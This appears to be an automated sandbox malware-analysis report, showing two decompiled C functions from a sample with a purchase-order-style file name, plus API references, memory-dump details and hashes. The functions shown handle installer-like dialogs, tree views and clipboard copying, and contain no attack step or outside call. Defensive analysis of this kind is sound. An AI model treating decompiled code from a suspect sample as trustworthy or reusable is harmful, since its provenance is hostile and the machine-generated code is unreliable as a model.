                                                                                                                          Function 00405125 Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 278windowclipboardmemoryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 95%
                                                                                                                          			E00405125(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
				struct HWND__* _v8;
				long _v12;
				struct tagRECT _v28;
				void* _v36;
				signed int _v40;
				int _v44;
				int _v48;
				signed int _v52;
				int _v56;
				void* _v60;
				void* _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t87;
				unsigned int _t92;
				int _t94;
				int _t95;
				void* _t101;
				intOrPtr _t123;
				struct HWND__* _t127;
				int _t149;
				int _t150;
				struct HWND__* _t154;
				struct HWND__* _t158;
				struct HMENU__* _t160;
				long _t162;
				void* _t163;
				short* _t164;

				_t154 =  *0x423764;
				_t149 = 0;
				_v8 = _t154;
				if(_a8 != 0x110) {
					if(_a8 == 0x405) {
						CloseHandle(CreateThread(0, 0, E004050B9, GetDlgItem(_a4, 0x3ec), 0,  &_v12));
					}
					if(_a8 != 0x111) {
						L17:
						if(_a8 != 0x404) {
							L25:
							if(_a8 != 0x7b || _a12 != _t154) {
								goto L20;
							} else {
								_t87 = SendMessageA(_t154, 0x1004, _t149, _t149);
								_a8 = _t87;
								if(_t87 <= _t149) {
									L37:
									return 0;
								}
								_t160 = CreatePopupMenu();
								AppendMenuA(_t160, _t149, 1, E00405D1D(_t149, _t154, _t160, _t149, 0xffffffe1));
								_t92 = _a16;
								if(_t92 != 0xffffffff) {
									_t150 = _t92;
									_t94 = _t92 >> 0x10;
								} else {
									GetWindowRect(_t154,  &_v28);
									_t150 = _v28.left;
									_t94 = _v28.top;
								}
								_t95 = TrackPopupMenu(_t160, 0x180, _t150, _t94, _t149, _a4, _t149);
								_t162 = 1;
								if(_t95 == 1) {
									_v60 = _t149;
									_v48 = 0x420580;
									_v44 = 0xfff;
									_a4 = _a8;
									do {
										_a4 = _a4 - 1;
										_t162 = _t162 + SendMessageA(_v8, 0x102d, _a4,  &_v68) + 2;
									} while (_a4 != _t149);
									OpenClipboard(_t149);
									EmptyClipboard();
									_t101 = GlobalAlloc(0x42, _t162);
									_a4 = _t101;
									_t163 = GlobalLock(_t101);
									do {
										_v48 = _t163;
										_t164 = _t163 + SendMessageA(_v8, 0x102d, _t149,  &_v68);
										 *_t164 = 0xa0d;
										_t163 = _t164 + 2;
										_t149 = _t149 + 1;
									} while (_t149 < _a8);
									GlobalUnlock(_a4);
									SetClipboardData(1, _a4);
									CloseClipboard();
								}
								goto L37;
							}
						}
						if( *0x42374c == _t149) {
							ShowWindow( *0x423f88, 8);
							if( *0x42400c == _t149) {
								E00404FE7( *((intOrPtr*)( *0x41fd50 + 0x34)), _t149);
							}
							E00403F90(1);
							goto L25;
						}
						 *0x41f948 = 2;
						E00403F90(0x78);
						goto L20;
					} else {
						if(_a12 != 0x403) {
							L20:
							return E0040401E(_a8, _a12, _a16);
						}
						ShowWindow( *0x423750, _t149);
						ShowWindow(_t154, 8);
						E00403FEC(_t154);
						goto L17;
					}
				}
				_v52 = _v52 | 0xffffffff;
				_v40 = _v40 | 0xffffffff;
				_v60 = 2;
				_v56 = 0;
				_v48 = 0;
				_v44 = 0;
				asm("stosd");
				asm("stosd");
				_t123 =  *0x423f90;
				_a8 =  *((intOrPtr*)(_t123 + 0x5c));
				_a12 =  *((intOrPtr*)(_t123 + 0x60));
				 *0x423750 = GetDlgItem(_a4, 0x403);
				 *0x423748 = GetDlgItem(_a4, 0x3ee);
				_t127 = GetDlgItem(_a4, 0x3f8);
				 *0x423764 = _t127;
				_v8 = _t127;
				E00403FEC( *0x423750);
				 *0x423754 = E00404889(4);
				 *0x42376c = 0;
				GetClientRect(_v8,  &_v28);
				_v52 = _v28.right - GetSystemMetrics(0x15);
				SendMessageA(_v8, 0x101b, 0,  &_v60);
				SendMessageA(_v8, 0x1036, 0x4000, 0x4000);
				if(_a8 >= 0) {
					SendMessageA(_v8, 0x1001, 0, _a8);
					SendMessageA(_v8, 0x1026, 0, _a8);
				}
				if(_a12 >= _t149) {
					SendMessageA(_v8, 0x1024, _t149, _a12);
				}
				_push( *((intOrPtr*)(_a16 + 0x30)));
				_push(0x1b);
				E00403FB7(_a4);
				if(( *0x423f98 & 0x00000003) != 0) {
					ShowWindow( *0x423750, _t149);
					if(( *0x423f98 & 0x00000002) != 0) {
						 *0x423750 = _t149;
					} else {
						ShowWindow(_v8, 8);
					}
					E00403FEC( *0x423748);
				}
				_t158 = GetDlgItem(_a4, 0x3ec);
				SendMessageA(_t158, 0x401, _t149, 0x75300000);
				if(( *0x423f98 & 0x00000004) != 0) {
					SendMessageA(_t158, 0x409, _t149, _a12);
					SendMessageA(_t158, 0x2001, _t149, _a8);
				}
				goto L37;
			}
































                                                                                                                          0x0040512e
                                                                                                                          0x00405134
                                                                                                                          0x0040513d
                                                                                                                          0x00405140
                                                                                                                          0x004052d8
                                                                                                                          0x004052fc
                                                                                                                          0x004052fc
                                                                                                                          0x0040530f
                                                                                                                          0x0040532d
                                                                                                                          0x00405334
                                                                                                                          0x0040538b
                                                                                                                          0x0040538f
                                                                                                                          0x00000000
                                                                                                                          0x00405396
                                                                                                                          0x0040539e
                                                                                                                          0x004053a6
                                                                                                                          0x004053a9
                                                                                                                          0x004054a2
                                                                                                                          0x00000000
                                                                                                                          0x004054a2
                                                                                                                          0x004053b8
                                                                                                                          0x004053c4
                                                                                                                          0x004053ca
                                                                                                                          0x004053d0
                                                                                                                          0x004053e5
                                                                                                                          0x004053eb
                                                                                                                          0x004053d2
                                                                                                                          0x004053d7
                                                                                                                          0x004053dd
                                                                                                                          0x004053e0
                                                                                                                          0x004053e0
                                                                                                                          0x004053fb
                                                                                                                          0x00405403
                                                                                                                          0x00405406
                                                                                                                          0x0040540f
                                                                                                                          0x00405412
                                                                                                                          0x00405419
                                                                                                                          0x00405420
                                                                                                                          0x00405428
                                                                                                                          0x00405428
                                                                                                                          0x0040543f
                                                                                                                          0x0040543f
                                                                                                                          0x00405446
                                                                                                                          0x0040544c
                                                                                                                          0x00405455
                                                                                                                          0x0040545c
                                                                                                                          0x00405465
                                                                                                                          0x00405467
                                                                                                                          0x0040546a
                                                                                                                          0x00405479
                                                                                                                          0x0040547b
                                                                                                                          0x00405481
                                                                                                                          0x00405482
                                                                                                                          0x00405483
                                                                                                                          0x0040548b
                                                                                                                          0x00405496
                                                                                                                          0x0040549c
                                                                                                                          0x0040549c
                                                                                                                          0x00000000
                                                                                                                          0x00405406
                                                                                                                          0x0040538f
                                                                                                                          0x0040533c
                                                                                                                          0x0040536c
                                                                                                                          0x00405374
                                                                                                                          0x0040537f
                                                                                                                          0x0040537f
                                                                                                                          0x00405386
                                                                                                                          0x00000000
                                                                                                                          0x00405386
                                                                                                                          0x00405340
                                                                                                                          0x0040534a
                                                                                                                          0x00000000
                                                                                                                          0x00405311
                                                                                                                          0x00405317
                                                                                                                          0x0040534f
                                                                                                                          0x00000000
                                                                                                                          0x00405358
                                                                                                                          0x00405320
                                                                                                                          0x00405325
                                                                                                                          0x00405328
                                                                                                                          0x00000000
                                                                                                                          0x00405328
                                                                                                                          0x0040530f
                                                                                                                          0x00405146
                                                                                                                          0x0040514a
                                                                                                                          0x00405153
                                                                                                                          0x0040515a
                                                                                                                          0x0040515d
                                                                                                                          0x00405160
                                                                                                                          0x00405163
                                                                                                                          0x00405164
                                                                                                                          0x00405165
                                                                                                                          0x0040517e
                                                                                                                          0x00405181
                                                                                                                          0x0040518b
                                                                                                                          0x0040519a
                                                                                                                          0x004051a2
                                                                                                                          0x004051aa
                                                                                                                          0x004051af
                                                                                                                          0x004051b2
                                                                                                                          0x004051be
                                                                                                                          0x004051c7
                                                                                                                          0x004051d0
                                                                                                                          0x004051f3
                                                                                                                          0x004051f9
                                                                                                                          0x0040520a
                                                                                                                          0x0040520f
                                                                                                                          0x0040521d
                                                                                                                          0x0040522b
                                                                                                                          0x0040522b
                                                                                                                          0x00405230
                                                                                                                          0x0040523e
                                                                                                                          0x0040523e
                                                                                                                          0x00405243
                                                                                                                          0x00405246
                                                                                                                          0x0040524b
                                                                                                                          0x00405257
                                                                                                                          0x00405260
                                                                                                                          0x0040526d
                                                                                                                          0x0040527c
                                                                                                                          0x0040526f
                                                                                                                          0x00405274
                                                                                                                          0x00405274
                                                                                                                          0x00405288
                                                                                                                          0x00405288
                                                                                                                          0x0040529c
                                                                                                                          0x004052a5
                                                                                                                          0x004052ae
                                                                                                                          0x004052be
                                                                                                                          0x004052ca
                                                                                                                          0x004052ca
                                                                                                                          0x00000000

                                                                                                                          APIs
                                                                                                                          • GetDlgItem.USER32 ref: 00405184
                                                                                                                          • GetDlgItem.USER32 ref: 00405193
                                                                                                                          • GetClientRect.USER32 ref: 004051D0
                                                                                                                          • GetSystemMetrics.USER32 ref: 004051D8
                                                                                                                          • SendMessageA.USER32(?,0000101B,00000000,00000002), ref: 004051F9
                                                                                                                          • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 0040520A
                                                                                                                          • SendMessageA.USER32(?,00001001,00000000,00000110), ref: 0040521D
                                                                                                                          • SendMessageA.USER32(?,00001026,00000000,00000110), ref: 0040522B
                                                                                                                          • SendMessageA.USER32(?,00001024,00000000,?), ref: 0040523E
                                                                                                                          • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405260
                                                                                                                          • ShowWindow.USER32(?,00000008), ref: 00405274
                                                                                                                          • GetDlgItem.USER32 ref: 00405295
                                                                                                                          • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 004052A5
                                                                                                                          • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 004052BE
                                                                                                                          • SendMessageA.USER32(00000000,00002001,00000000,00000110), ref: 004052CA
                                                                                                                          • GetDlgItem.USER32 ref: 004051A2
                                                                                                                            • Part of subcall function 00403FEC: SendMessageA.USER32(00000028,?,00000001,00403E1D), ref: 00403FFA
                                                                                                                          • GetDlgItem.USER32 ref: 004052E7
                                                                                                                          • CreateThread.KERNEL32 ref: 004052F5
                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 004052FC
                                                                                                                          • ShowWindow.USER32(00000000), ref: 00405320
                                                                                                                          • ShowWindow.USER32(?,00000008), ref: 00405325
                                                                                                                          • ShowWindow.USER32(00000008), ref: 0040536C
                                                                                                                          • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040539E
                                                                                                                          • CreatePopupMenu.USER32 ref: 004053AF
                                                                                                                          • AppendMenuA.USER32 ref: 004053C4
                                                                                                                          • GetWindowRect.USER32 ref: 004053D7
                                                                                                                          • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004053FB
                                                                                                                          • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405436
                                                                                                                          • OpenClipboard.USER32(00000000), ref: 00405446
                                                                                                                          • EmptyClipboard.USER32(?,?,00000000,?,00000000), ref: 0040544C
                                                                                                                          • GlobalAlloc.KERNEL32(00000042,?,?,?,00000000,?,00000000), ref: 00405455
                                                                                                                          • GlobalLock.KERNEL32 ref: 0040545F
                                                                                                                          • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405473
                                                                                                                          • GlobalUnlock.KERNEL32(00000000,?,?,00000000,?,00000000), ref: 0040548B
                                                                                                                          • SetClipboardData.USER32 ref: 00405496
                                                                                                                          • CloseClipboard.USER32 ref: 0040549C
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.311379785.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.311367620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311403343.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311443229.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311459049.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311508906.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311558346.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311574736.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_New PO-RJ-IN-003 - Knauf Queimados.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                                          • String ID: {
                                                                                                                          • API String ID: 590372296-366298937
                                                                                                                          • Opcode ID: 04b6882ea7cea37b6f5b214f95382faacd07c0f71360ca926f2f0a7f5b2d3af5
                                                                                                                          • Instruction ID: e424ca0b0cb309e3be77902d9308c86312c6ad68702b37108e1cfd0bc7beca4c
                                                                                                                          • Opcode Fuzzy Hash: 04b6882ea7cea37b6f5b214f95382faacd07c0f71360ca926f2f0a7f5b2d3af5
                                                                                                                          • Instruction Fuzzy Hash: 3FA13AB0900209BFDB11AFA1DD89AAE7F79FB44355F00803AFA05BA1E0C7795A41DF59
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00404936 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 478windowmemoryCOMMONCrypto
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 97%
                                                                                                                          			E00404936(struct HWND__* _a4, int _a8, unsigned int _a12, int _a16) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				signed int _v16;
				intOrPtr _v20;
				void* _v24;
				long _v28;
				int _v32;
				signed int _v40;
				int _v44;
				signed int* _v56;
				intOrPtr _v60;
				signed int _v64;
				long _v68;
				void* _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				void* _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HWND__* _t182;
				int _t196;
				long _t202;
				signed int _t206;
				signed int _t217;
				void* _t220;
				void* _t221;
				int _t227;
				signed int _t232;
				signed int _t233;
				signed int _t240;
				struct HBITMAP__* _t250;
				void* _t252;
				char* _t268;
				signed char _t269;
				long _t274;
				int _t280;
				signed int* _t281;
				int _t282;
				long _t283;
				int _t285;
				long _t286;
				signed int _t287;
				long _t288;
				signed int _t291;
				signed int _t298;
				signed int _t300;
				signed int _t302;
				int* _t310;
				void* _t311;
				int _t315;
				int _t316;
				int _t317;
				signed int _t318;
				void* _t320;

				_v12 = GetDlgItem(_a4, 0x3f9);
				_t182 = GetDlgItem(_a4, 0x408);
				_t280 =  *0x423fa8;
				_t320 = SendMessageA;
				_v8 = _t182;
				_t315 = 0;
				_v32 = _t280;
				_v20 =  *0x423f90 + 0x94;
				if(_a8 != 0x110) {
					L23:
					if(_a8 != 0x405) {
						_t289 = _a16;
					} else {
						_a12 = _t315;
						_t289 = 1;
						_a8 = 0x40f;
						_a16 = 1;
					}
					if(_a8 == 0x4e || _a8 == 0x413) {
						_v16 = _t289;
						if(_a8 == 0x413 ||  *((intOrPtr*)(_t289 + 4)) == 0x408) {
							if(( *0x423f99 & 0x00000002) != 0) {
								L41:
								if(_v16 != _t315) {
									_t232 = _v16;
									if( *((intOrPtr*)(_t232 + 8)) == 0xfffffe6e) {
										SendMessageA(_v8, 0x419, _t315,  *(_t232 + 0x5c));
									}
									_t233 = _v16;
									if( *((intOrPtr*)(_t233 + 8)) == 0xfffffe6a) {
										if( *((intOrPtr*)(_t233 + 0xc)) != 2) {
											 *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) =  *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) & 0xffffffdf;
										} else {
											 *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) =  *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) | 0x00000020;
										}
									}
								}
								goto L48;
							}
							if(_a8 == 0x413) {
								L33:
								_t289 = 0 | _a8 != 0x00000413;
								_t240 = E004048B6(_v8, _a8 != 0x413);
								if(_t240 >= _t315) {
									_t93 = _t280 + 8; // 0x8
									_t310 = _t240 * 0x418 + _t93;
									_t289 =  *_t310;
									if((_t289 & 0x00000010) == 0) {
										if((_t289 & 0x00000040) == 0) {
											_t298 = _t289 ^ 0x00000001;
										} else {
											_t300 = _t289 ^ 0x00000080;
											if(_t300 >= 0) {
												_t298 = _t300 & 0xfffffffe;
											} else {
												_t298 = _t300 | 0x00000001;
											}
										}
										 *_t310 = _t298;
										E0040117D(_t240);
										_t289 = 1;
										_a8 = 0x40f;
										_a12 = 1;
										_a16 =  !( *0x423f98) >> 0x00000008 & 1;
									}
								}
								goto L41;
							}
							_t289 = _a16;
							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
								goto L41;
							}
							goto L33;
						} else {
							goto L48;
						}
					} else {
						L48:
						if(_a8 != 0x111) {
							L56:
							if(_a8 == 0x200) {
								SendMessageA(_v8, 0x200, _t315, _t315);
							}
							if(_a8 == 0x40b) {
								_t220 =  *0x42055c;
								if(_t220 != _t315) {
									ImageList_Destroy(_t220);
								}
								_t221 =  *0x420574;
								if(_t221 != _t315) {
									GlobalFree(_t221);
								}
								 *0x42055c = _t315;
								 *0x420574 = _t315;
								 *0x423fe0 = _t315;
							}
							if(_a8 != 0x40f) {
								L86:
								if(_a8 == 0x420 && ( *0x423f99 & 0x00000001) != 0) {
									_t316 = (0 | _a16 == 0x00000020) << 3;
									ShowWindow(_v8, _t316);
									ShowWindow(GetDlgItem(_a4, 0x3fe), _t316);
								}
								goto L89;
							} else {
								E004011EF(_t289, _t315, _t315);
								if(_a12 != _t315) {
									E0040140B(8);
								}
								if(_a16 == _t315) {
									L73:
									E004011EF(_t289, _t315, _t315);
									_v32 =  *0x420574;
									_t196 =  *0x423fa8;
									_v60 = 0xf030;
									_v16 = _t315;
									if( *0x423fac <= _t315) {
										L84:
										InvalidateRect(_v8, _t315, 1);
										if( *((intOrPtr*)( *0x42375c + 0x10)) != _t315) {
											E00404871(0x3ff, 0xfffffffb, E00404889(5));
										}
										goto L86;
									}
									_t281 = _t196 + 8;
									do {
										_t202 =  *((intOrPtr*)(_v32 + _v16 * 4));
										if(_t202 != _t315) {
											_t291 =  *_t281;
											_v68 = _t202;
											_v72 = 8;
											if((_t291 & 0x00000001) != 0) {
												_v72 = 9;
												_v56 =  &(_t281[4]);
												_t281[0] = _t281[0] & 0x000000fe;
											}
											if((_t291 & 0x00000040) == 0) {
												_t206 = (_t291 & 0x00000001) + 1;
												if((_t291 & 0x00000010) != 0) {
													_t206 = _t206 + 3;
												}
											} else {
												_t206 = 3;
											}
											_v64 = (_t206 << 0x0000000b | _t291 & 0x00000008) + (_t206 << 0x0000000b | _t291 & 0x00000008) | _t291 & 0x00000020;
											SendMessageA(_v8, 0x1102, (_t291 >> 0x00000005 & 0x00000001) + 1, _v68);
											SendMessageA(_v8, 0x110d, _t315,  &_v72);
										}
										_v16 = _v16 + 1;
										_t281 =  &(_t281[0x106]);
									} while (_v16 <  *0x423fac);
									goto L84;
								} else {
									_t282 = E004012E2( *0x420574);
									E00401299(_t282);
									_t217 = 0;
									_t289 = 0;
									if(_t282 <= _t315) {
										L72:
										SendMessageA(_v12, 0x14e, _t289, _t315);
										_a16 = _t282;
										_a8 = 0x420;
										goto L73;
									} else {
										goto L69;
									}
									do {
										L69:
										if( *((intOrPtr*)(_v20 + _t217 * 4)) != _t315) {
											_t289 = _t289 + 1;
										}
										_t217 = _t217 + 1;
									} while (_t217 < _t282);
									goto L72;
								}
							}
						}
						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
							goto L89;
						} else {
							_t227 = SendMessageA(_v12, 0x147, _t315, _t315);
							if(_t227 == 0xffffffff) {
								goto L89;
							}
							_t283 = SendMessageA(_v12, 0x150, _t227, _t315);
							if(_t283 == 0xffffffff ||  *((intOrPtr*)(_v20 + _t283 * 4)) == _t315) {
								_t283 = 0x20;
							}
							E00401299(_t283);
							SendMessageA(_a4, 0x420, _t315, _t283);
							_a12 = 1;
							_a16 = _t315;
							_a8 = 0x40f;
							goto L56;
						}
					}
				} else {
					 *0x423fe0 = _a4;
					_t285 = 2;
					_v28 = 0;
					_v16 = _t285;
					 *0x420574 = GlobalAlloc(0x40,  *0x423fac << 2);
					_t250 = LoadBitmapA( *0x423f80, 0x6e);
					 *0x420568 =  *0x420568 | 0xffffffff;
					_v24 = _t250;
					 *0x420570 = SetWindowLongA(_v8, 0xfffffffc, E00404F37);
					_t252 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
					 *0x42055c = _t252;
					ImageList_AddMasked(_t252, _v24, 0xff00ff);
					SendMessageA(_v8, 0x1109, _t285,  *0x42055c);
					if(SendMessageA(_v8, 0x111c, 0, 0) < 0x10) {
						SendMessageA(_v8, 0x111b, 0x10, 0);
					}
					DeleteObject(_v24);
					_t286 = 0;
					do {
						_t258 =  *((intOrPtr*)(_v20 + _t286 * 4));
						if( *((intOrPtr*)(_v20 + _t286 * 4)) != _t315) {
							if(_t286 != 0x20) {
								_v16 = _t315;
							}
							SendMessageA(_v12, 0x151, SendMessageA(_v12, 0x143, _t315, E00405D1D(_t286, _t315, _t320, _t315, _t258)), _t286);
						}
						_t286 = _t286 + 1;
					} while (_t286 < 0x21);
					_t317 = _a16;
					_t287 = _v16;
					_push( *((intOrPtr*)(_t317 + 0x30 + _t287 * 4)));
					_push(0x15);
					E00403FB7(_a4);
					_push( *((intOrPtr*)(_t317 + 0x34 + _t287 * 4)));
					_push(0x16);
					E00403FB7(_a4);
					_t318 = 0;
					_t288 = 0;
					if( *0x423fac <= 0) {
						L19:
						SetWindowLongA(_v8, 0xfffffff0, GetWindowLongA(_v8, 0xfffffff0) & 0x000000fb);
						goto L20;
					} else {
						_t311 = _v32 + 8;
						_v24 = _t311;
						do {
							_t268 = _t311 + 0x10;
							if( *_t268 != 0) {
								_v60 = _t268;
								_t269 =  *_t311;
								_t302 = 0x20;
								_v84 = _t288;
								_v80 = 0xffff0002;
								_v76 = 0xd;
								_v64 = _t302;
								_v40 = _t318;
								_v68 = _t269 & _t302;
								if((_t269 & 0x00000002) == 0) {
									if((_t269 & 0x00000004) == 0) {
										 *( *0x420574 + _t318 * 4) = SendMessageA(_v8, 0x1100, 0,  &_v84);
									} else {
										_t288 = SendMessageA(_v8, 0x110a, 3, _t288);
									}
								} else {
									_v76 = 0x4d;
									_v44 = 1;
									_t274 = SendMessageA(_v8, 0x1100, 0,  &_v84);
									_v28 = 1;
									 *( *0x420574 + _t318 * 4) = _t274;
									_t288 =  *( *0x420574 + _t318 * 4);
								}
							}
							_t318 = _t318 + 1;
							_t311 = _v24 + 0x418;
							_v24 = _t311;
						} while (_t318 <  *0x423fac);
						if(_v28 != 0) {
							L20:
							if(_v16 != 0) {
								E00403FEC(_v8);
								_t280 = _v32;
								_t315 = 0;
								goto L23;
							} else {
								ShowWindow(_v12, 5);
								E00403FEC(_v12);
								L89:
								return E0040401E(_a8, _a12, _a16);
							}
						}
						goto L19;
					}
				}
			}


























































                                                                                                                          0x00404954
                                                                                                                          0x0040495a
                                                                                                                          0x0040495c
                                                                                                                          0x00404962
                                                                                                                          0x00404968
                                                                                                                          0x00404975
                                                                                                                          0x0040497e
                                                                                                                          0x00404981
                                                                                                                          0x00404984
                                                                                                                          0x00404bac
                                                                                                                          0x00404bb3
                                                                                                                          0x00404bc7
                                                                                                                          0x00404bb5
                                                                                                                          0x00404bb7
                                                                                                                          0x00404bba
                                                                                                                          0x00404bbb
                                                                                                                          0x00404bc2
                                                                                                                          0x00404bc2
                                                                                                                          0x00404bd3
                                                                                                                          0x00404be1
                                                                                                                          0x00404be4
                                                                                                                          0x00404bfa
                                                                                                                          0x00404c72
                                                                                                                          0x00404c75
                                                                                                                          0x00404c77
                                                                                                                          0x00404c81
                                                                                                                          0x00404c8f
                                                                                                                          0x00404c8f
                                                                                                                          0x00404c91
                                                                                                                          0x00404c9b
                                                                                                                          0x00404ca1
                                                                                                                          0x00404cc2
                                                                                                                          0x00404ca3
                                                                                                                          0x00404cb0
                                                                                                                          0x00404cb0
                                                                                                                          0x00404ca1
                                                                                                                          0x00404c9b
                                                                                                                          0x00000000
                                                                                                                          0x00404c75
                                                                                                                          0x00404bff
                                                                                                                          0x00404c0a
                                                                                                                          0x00404c0f
                                                                                                                          0x00404c16
                                                                                                                          0x00404c1d
                                                                                                                          0x00404c27
                                                                                                                          0x00404c27
                                                                                                                          0x00404c2b
                                                                                                                          0x00404c30
                                                                                                                          0x00404c35
                                                                                                                          0x00404c4b
                                                                                                                          0x00404c37
                                                                                                                          0x00404c37
                                                                                                                          0x00404c3f
                                                                                                                          0x00404c46
                                                                                                                          0x00404c41
                                                                                                                          0x00404c41
                                                                                                                          0x00404c41
                                                                                                                          0x00404c3f
                                                                                                                          0x00404c4f
                                                                                                                          0x00404c51
                                                                                                                          0x00404c5f
                                                                                                                          0x00404c60
                                                                                                                          0x00404c6c
                                                                                                                          0x00404c6f
                                                                                                                          0x00404c6f
                                                                                                                          0x00404c30
                                                                                                                          0x00000000
                                                                                                                          0x00404c1d
                                                                                                                          0x00404c01
                                                                                                                          0x00404c08
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00404cc5
                                                                                                                          0x00404cc5
                                                                                                                          0x00404ccc
                                                                                                                          0x00404d40
                                                                                                                          0x00404d47
                                                                                                                          0x00404d53
                                                                                                                          0x00404d53
                                                                                                                          0x00404d5c
                                                                                                                          0x00404d5e
                                                                                                                          0x00404d65
                                                                                                                          0x00404d68
                                                                                                                          0x00404d68
                                                                                                                          0x00404d6e
                                                                                                                          0x00404d75
                                                                                                                          0x00404d78
                                                                                                                          0x00404d78
                                                                                                                          0x00404d7e
                                                                                                                          0x00404d84
                                                                                                                          0x00404d8a
                                                                                                                          0x00404d8a
                                                                                                                          0x00404d97
                                                                                                                          0x00404ee4
                                                                                                                          0x00404eeb
                                                                                                                          0x00404f08
                                                                                                                          0x00404f0e
                                                                                                                          0x00404f20
                                                                                                                          0x00404f20
                                                                                                                          0x00000000
                                                                                                                          0x00404d9d
                                                                                                                          0x00404d9f
                                                                                                                          0x00404da7
                                                                                                                          0x00404dab
                                                                                                                          0x00404dab
                                                                                                                          0x00404db3
                                                                                                                          0x00404df4
                                                                                                                          0x00404df6
                                                                                                                          0x00404e06
                                                                                                                          0x00404e09
                                                                                                                          0x00404e0e
                                                                                                                          0x00404e15
                                                                                                                          0x00404e18
                                                                                                                          0x00404eba
                                                                                                                          0x00404ec0
                                                                                                                          0x00404ece
                                                                                                                          0x00404edf
                                                                                                                          0x00404edf
                                                                                                                          0x00000000
                                                                                                                          0x00404ece
                                                                                                                          0x00404e1e
                                                                                                                          0x00404e21
                                                                                                                          0x00404e27
                                                                                                                          0x00404e2c
                                                                                                                          0x00404e2e
                                                                                                                          0x00404e30
                                                                                                                          0x00404e36
                                                                                                                          0x00404e3d
                                                                                                                          0x00404e42
                                                                                                                          0x00404e49
                                                                                                                          0x00404e4c
                                                                                                                          0x00404e4c
                                                                                                                          0x00404e53
                                                                                                                          0x00404e5f
                                                                                                                          0x00404e63
                                                                                                                          0x00404e65
                                                                                                                          0x00404e65
                                                                                                                          0x00404e55
                                                                                                                          0x00404e57
                                                                                                                          0x00404e57
                                                                                                                          0x00404e85
                                                                                                                          0x00404e91
                                                                                                                          0x00404ea0
                                                                                                                          0x00404ea0
                                                                                                                          0x00404ea2
                                                                                                                          0x00404ea5
                                                                                                                          0x00404eae
                                                                                                                          0x00000000
                                                                                                                          0x00404db5
                                                                                                                          0x00404dc0
                                                                                                                          0x00404dc3
                                                                                                                          0x00404dc8
                                                                                                                          0x00404dca
                                                                                                                          0x00404dce
                                                                                                                          0x00404dde
                                                                                                                          0x00404de8
                                                                                                                          0x00404dea
                                                                                                                          0x00404ded
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00404dd0
                                                                                                                          0x00404dd0
                                                                                                                          0x00404dd6
                                                                                                                          0x00404dd8
                                                                                                                          0x00404dd8
                                                                                                                          0x00404dd9
                                                                                                                          0x00404dda
                                                                                                                          0x00000000
                                                                                                                          0x00404dd0
                                                                                                                          0x00404db3
                                                                                                                          0x00404d97
                                                                                                                          0x00404cd4
                                                                                                                          0x00000000
                                                                                                                          0x00404cea
                                                                                                                          0x00404cf4
                                                                                                                          0x00404cf9
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00404d0b
                                                                                                                          0x00404d10
                                                                                                                          0x00404d1c
                                                                                                                          0x00404d1c
                                                                                                                          0x00404d1e
                                                                                                                          0x00404d2d
                                                                                                                          0x00404d2f
                                                                                                                          0x00404d36
                                                                                                                          0x00404d39
                                                                                                                          0x00000000
                                                                                                                          0x00404d39
                                                                                                                          0x00404cd4
                                                                                                                          0x0040498a
                                                                                                                          0x0040498f
                                                                                                                          0x00404999
                                                                                                                          0x0040499a
                                                                                                                          0x004049a3
                                                                                                                          0x004049ae
                                                                                                                          0x004049b9
                                                                                                                          0x004049bf
                                                                                                                          0x004049cd
                                                                                                                          0x004049e2
                                                                                                                          0x004049e7
                                                                                                                          0x004049f2
                                                                                                                          0x004049fb
                                                                                                                          0x00404a10
                                                                                                                          0x00404a21
                                                                                                                          0x00404a2e
                                                                                                                          0x00404a2e
